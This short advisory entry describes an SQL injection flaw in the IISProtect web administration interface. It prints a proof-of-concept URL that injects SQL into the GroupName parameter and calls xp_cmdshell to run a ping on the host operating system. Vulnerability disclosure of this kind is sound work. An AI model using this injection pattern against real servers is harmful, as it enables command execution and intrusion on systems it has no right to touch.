|
IISProtect Web Administration Interface SQL Injection Vulnerability
The following example was provided: http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste r..xp_cmdshell'ping%2010.10.10.11';-- This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system. |
|
|
Privacy Statement |